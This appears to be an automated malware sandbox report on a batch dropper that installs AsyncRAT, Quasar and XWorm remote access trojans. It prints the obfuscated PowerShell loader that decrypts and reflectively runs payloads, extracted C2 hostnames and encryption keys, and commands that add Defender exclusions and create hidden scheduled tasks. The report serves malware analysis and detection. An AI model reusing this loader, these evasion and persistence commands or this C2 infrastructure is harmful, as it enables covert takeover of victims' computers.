Overview

overview

10

Static

static

10

zvgfd-main...iz.bat

windows10-2004-x64

1

zvgfd-main...lt.exe

windows10-2004-x64

zvgfd-main/Client.bat

windows10-2004-x64

10

zvgfd-main...lt.exe

windows10-2004-x64

zvgfd-main... .exe

windows10-2004-x64

10

zvgfd-main...ol.exe

windows10-2004-x64

10

zvgfd-main...ol.exe

windows10-2004-x64

10

zvgfd-main...ve.bat

windows10-2004-x64

10

zvgfd-main...ve.exe

windows10-2004-x64

10

zvgfd-main...ke.bat

windows10-2004-x64

10

zvgfd-main...V2.exe

windows10-2004-x64

10

zvgfd-main...ll.exe

windows10-2004-x64

10

zvgfd-main...up.exe

windows10-2004-x64

8

zvgfd-main/Output.exe

windows10-2004-x64

10

zvgfd-main/Part 1.bat

windows10-2004-x64

10

zvgfd-main/Part 2.bat

windows10-2004-x64

1

zvgfd-main...om.exe

windows10-2004-x64

1

zvgfd-main...er.exe

windows10-2004-x64

10

zvgfd-main/Server.exe

windows10-2004-x64

10

zvgfd-main/Uni.exe

windows10-2004-x64

10

zvgfd-main/Uni.exe

windows10-2004-x64

10

zvgfd-main...ol.exe

windows10-2004-x64

10

zvgfd-main...ol.exe

windows10-2004-x64

10

zvgfd-main...nt.exe

windows10-2004-x64

10

zvgfd-main...st.exe

windows10-2004-x64

10

zvgfd-main/asjdfg.exe

windows10-2004-x64

10

zvgfd-main...-3.dll

windows10-2004-x64

3

zvgfd-main...h2.dll

windows10-2004-x64

3

zvgfd-main...-3.dll

windows10-2004-x64

1

zvgfd-main/main.exe

windows10-2004-x64

7

zvgfd-main/ncat.exe

windows10-2004-x64

1

zvgfd-main...ad.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-07-2024 16:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    zvgfd-main/Part 1.bat

  • Size

    580KB

  • MD5

    8b844b2b29752a8a1c62efaa59dba4be

  • SHA1

    0c467148d558c4b7d6672d5b26a79af5f7fb96d4

  • SHA256

    ccb4ad561b87927edd97a02436014944c9147fe78934d2a26de73c7ee1704d0d

  • SHA512

    e086dfb88842e19c552ec00d989ae453743cabeddae93359cde6afc62354042d6ab366039e71819ad0a79319fb17ce98ec77bafb31f6183ba8a87cbb2c1df8a0

  • SSDEEP

    12288:dgOsRaPeA/fpkyocgcQwO57n+2HCZ/ySemGKDuE2wROnCFkw:dAcbBkBJwy+2HCESoZy

Score
10/10
asyncratquasarxwormdefaultslaveexecutionpersistenceratspywaretrojan

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Extracted

Family

xworm

C2

super-nearest.gl.at.ply.gg:17835

best-bird.gl.at.ply.gg:27196

wiz.bounceme.net:6000
Attributes
  • Install_directory

    %ProgramData%

aes.plain

Extracted

Family

asyncrat

Botnet

Default

C2

finally-grande.gl.at.ply.gg:25844

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

stop-largely.gl.at.ply.gg:27116

Mutex

$Sxr-kl1r656AGsPQksTmi8

Attributes
  • encryption_key

    WyBm1iVkHZmEnGPMAZWV

  • install_name

    $phantom.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    $phantomSTARTUP~MSF

  • subdirectory

    $phantom

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Detect Xworm Payload 5 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 3 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Async RAT payload 2 IoCs
    rat
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 1.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3284
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uMhFm9Heyf0m35R7TqcwatHx8y7t/S5Yp9g45Hv0RJQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cYkB+WZDehKcJNABs1GBow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dLVmD=New-Object System.IO.MemoryStream(,$param_var); $PrWUn=New-Object System.IO.MemoryStream; $NtSFg=New-Object System.IO.Compression.GZipStream($dLVmD, [IO.Compression.CompressionMode]::Decompress); $NtSFg.CopyTo($PrWUn); $NtSFg.Dispose(); $dLVmD.Dispose(); $PrWUn.Dispose(); $PrWUn.ToArray();}function execute_function($param_var,$param2_var){ $TQPiU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iqsry=$TQPiU.EntryPoint; $iqsry.Invoke($null, $param2_var);}$qcgQF = 'C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 1.bat';$host.UI.RawUI.WindowTitle = $qcgQF;$XDAmi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($qcgQF).Split([Environment]::NewLine);foreach ($jksJC in $XDAmi) { if ($jksJC.StartsWith('JTCOZdwpBOYBkUChqpKD')) { $HLFxX=$jksJC.Substring(20); break; }}$payloads_var=[string[]]$HLFxX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      2⤵
        PID:2784
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2312
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_10_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_10.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4072
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_10.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4128
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_10.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1824
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uMhFm9Heyf0m35R7TqcwatHx8y7t/S5Yp9g45Hv0RJQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cYkB+WZDehKcJNABs1GBow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dLVmD=New-Object System.IO.MemoryStream(,$param_var); $PrWUn=New-Object System.IO.MemoryStream; $NtSFg=New-Object System.IO.Compression.GZipStream($dLVmD, [IO.Compression.CompressionMode]::Decompress); $NtSFg.CopyTo($PrWUn); $NtSFg.Dispose(); $dLVmD.Dispose(); $PrWUn.Dispose(); $PrWUn.ToArray();}function execute_function($param_var,$param2_var){ $TQPiU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iqsry=$TQPiU.EntryPoint; $iqsry.Invoke($null, $param2_var);}$qcgQF = 'C:\Users\Admin\AppData\Roaming\Windows_Log_10.bat';$host.UI.RawUI.WindowTitle = $qcgQF;$XDAmi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($qcgQF).Split([Environment]::NewLine);foreach ($jksJC in $XDAmi) { if ($jksJC.StartsWith('JTCOZdwpBOYBkUChqpKD')) { $HLFxX=$jksJC.Substring(20); break; }}$payloads_var=[string[]]$HLFxX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
              5⤵
                PID:4492
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                5⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:1008
                • C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 4.exe
                  "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 4.exe"
                  6⤵
                  • Checks computer location settings
                  • Drops startup file
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:4772
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 4.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4764
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Part 4.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2492
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Part 4.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2432
                  • C:\Windows\System32\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Part 4" /tr "C:\ProgramData\Part 4.exe"
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3640
                • C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 3.exe
                  "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 3.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:4400
                • C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 2.exe
                  "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 2.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:3916
                  • C:\Windows\SysWOW64\schtasks.exe
                    "schtasks" /create /tn "$phantomSTARTUP~MSF" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 2.exe" /rl HIGHEST /f
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:1712
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3192
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1480
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WINDOWSBIOS .COM'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5112
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WINDOWSBIOS .COM'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:224
                • C:\Windows\System32\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WINDOWSBIOS " /tr "C:\ProgramData\WINDOWSBIOS .COM"
                  6⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:3404
      • C:\ProgramData\Part 4.exe
        "C:\ProgramData\Part 4.exe"
        1⤵
        • Executes dropped EXE
        PID:1700
      • C:\ProgramData\Part 4.exe
        "C:\ProgramData\Part 4.exe"
        1⤵
        • Executes dropped EXE
        PID:1580

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Part 4.exe.log
        Filesize

        654B

        MD5

        2ff39f6c7249774be85fd60a8f9a245e

        SHA1

        684ff36b31aedc1e587c8496c02722c6698c1c4e

        SHA256

        e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

        SHA512

        1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        661739d384d9dfd807a089721202900b

        SHA1

        5b2c5d6a7122b4ce849dc98e79a7713038feac55

        SHA256

        70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

        SHA512

        81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        2KB

        MD5

        005bc2ef5a9d890fb2297be6a36f01c2

        SHA1

        0c52adee1316c54b0bfdc510c0963196e7ebb430

        SHA256

        342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

        SHA512

        f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        8f02e6be4668f376a39c77eeda0fe2ad

        SHA1

        3c0706c343ce551c87060ef4f074a815b2ca592a

        SHA256

        68758460e91fb9dc1285782c1a5df62016bcffffdb16aeb8ad5903ec6b2721b2

        SHA512

        5229b5e9052ee5a62b0c1492abef8887c1f2050be1b4ac2a1e397afc8d8c2dad660faf55fd8084da16a68576951495d7c550fc4a765671e296435043405ec63c

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        6d3e9c29fe44e90aae6ed30ccf799ca8

        SHA1

        c7974ef72264bbdf13a2793ccf1aed11bc565dce

        SHA256

        2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

        SHA512

        60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        15dde0683cd1ca19785d7262f554ba93

        SHA1

        d039c577e438546d10ac64837b05da480d06bf69

        SHA256

        d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

        SHA512

        57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        0256bd284691ed0fc502ef3c8a7e58dc

        SHA1

        dcdf69dc8ca8bf068f65d20ef1563bbe283e2413

        SHA256

        e2fb83098e114084f51ed7187334f861ce670051046c39f338928296ca9a49cf

        SHA512

        c5b29c1e0a15ddb68b0579848066774fa7cdc6f35087bbbf47c05a5c0dcc1eb3e61b2ddadfbded8c1ed9820e637596a9f08a97db8fb18000d168e6b159060c42

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ef40wow.e3z.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 2.exe
        Filesize

        409KB

        MD5

        301613f1fcda48ebade4c197175be1a0

        SHA1

        03f58ab72f3c2d991418861adfc9c3b3289640a0

        SHA256

        1772f8bfc84772485e5b2388bb8942c28a9f2803a5f879e275d9b9d3eb923d41

        SHA512

        375c55fc09f1f0ef1a394b57f38916f103c36aaf8f4ec9a6939dcfaf147ebc3121537f2ebe1061b3851043dd44001f0a6630abe8e32549bf95d3e12f81308525

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 3.exe
        Filesize

        63KB

        MD5

        ec57b49d155e05d971f73e2eb3d3d01f

        SHA1

        f8537e9b44342a71f1f8bf48548b27574f17ff7c

        SHA256

        baf3237f6c2b6c49ca7572213bc72f0dea9a4afcd37f90ea2d13a542d83d2a9c

        SHA512

        e27191657d4339d44dfb32a637efe1168d57520ee1c320dc7997f8944c627595e66abe72ed5039f005b01e2e2d1a5ca9df7c5a10ad0092305c07dd64f29ff533

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Part 4.exe
        Filesize

        81KB

        MD5

        6fac9c3612488908d9aa6ed9e8234f9f

        SHA1

        8b36017162e06e76a450e2ecceee4d3a68bb3905

        SHA256

        0ca49b53ed70a9fabe46a92daa4a134f1afaf99b9098f81e33084a95c8586606

        SHA512

        e71b4cef4f488fc2cc771c1df5466ed6edd12d5cf3bfcf2825f0ec87bbcb66afabcba957dbfeee621e3c03e897bec1cede8d88f3c9e255b4fd40ddbdfaa5794e

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Windows_Log_10.bat
        Filesize

        580KB

        MD5

        8b844b2b29752a8a1c62efaa59dba4be

        SHA1

        0c467148d558c4b7d6672d5b26a79af5f7fb96d4

        SHA256

        ccb4ad561b87927edd97a02436014944c9147fe78934d2a26de73c7ee1704d0d

        SHA512

        e086dfb88842e19c552ec00d989ae453743cabeddae93359cde6afc62354042d6ab366039e71819ad0a79319fb17ce98ec77bafb31f6183ba8a87cbb2c1df8a0

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Windows_Log_10.vbs
        Filesize

        114B

        MD5

        20b518604f4c00f6aff85a64f7e8fe67

        SHA1

        61363d479a856f9489a8dfaa8d9e538218e9f9b4

        SHA256

        4bdf05cc938790a2fc459be1f10865aa120826a745702c3fe2b582451930f368

        SHA512

        d3bceed7c504b69b5f11e4010d2a757f6acf42e7e175b7ed95d6a4134b0724478adf3a23bd346e8df82d1ae213b47b1830ee788f5276d624ce383d8200ef2df3

        Download Submit

      • memory/1008-57-0x000001F51C1D0000-0x000001F51C1E8000-memory.dmp

        Filesize

        96KB

        Download

      • memory/2312-16-0x000001F1DC8B0000-0x000001F1DC960000-memory.dmp

        Filesize

        704KB

        Download

      • memory/2312-15-0x000001F1DC380000-0x000001F1DC388000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2312-0-0x00007FFED3AC3000-0x00007FFED3AC5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2312-14-0x000001F1DC830000-0x000001F1DC8A6000-memory.dmp

        Filesize

        472KB

        Download

      • memory/2312-50-0x00007FFED3AC0000-0x00007FFED4581000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2312-13-0x00007FFED3AC0000-0x00007FFED4581000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2312-12-0x000001F1DC3A0000-0x000001F1DC3E4000-memory.dmp

        Filesize

        272KB

        Download

      • memory/2312-11-0x00007FFED3AC0000-0x00007FFED4581000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2312-1-0x000001F1C1FF0000-0x000001F1C2012000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3916-93-0x0000000004C00000-0x0000000004C66000-memory.dmp

        Filesize

        408KB

        Download

      • memory/3916-176-0x0000000006380000-0x000000000638A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/3916-91-0x00000000051B0000-0x0000000005754000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/3916-92-0x0000000004B50000-0x0000000004BE2000-memory.dmp

        Filesize

        584KB

        Download

      • memory/3916-90-0x00000000000E0000-0x000000000014C000-memory.dmp

        Filesize

        432KB

        Download

      • memory/3916-94-0x0000000005860000-0x0000000005872000-memory.dmp

        Filesize

        72KB

        Download

      • memory/3916-95-0x0000000005DA0000-0x0000000005DDC000-memory.dmp

        Filesize

        240KB

        Download

      • memory/4072-24-0x00007FFED3AC0000-0x00007FFED4581000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4072-32-0x00007FFED3AC0000-0x00007FFED4581000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4072-29-0x00007FFED3AC0000-0x00007FFED4581000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4072-28-0x00007FFED3AC0000-0x00007FFED4581000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4400-89-0x00000000000D0000-0x00000000000E6000-memory.dmp

        Filesize

        88KB

        Download

      • memory/4772-186-0x000000001C6A0000-0x000000001C6AE000-memory.dmp

        Filesize

        56KB

        Download

      • memory/4772-86-0x0000000000270000-0x000000000028A000-memory.dmp

        Filesize

        104KB

        Download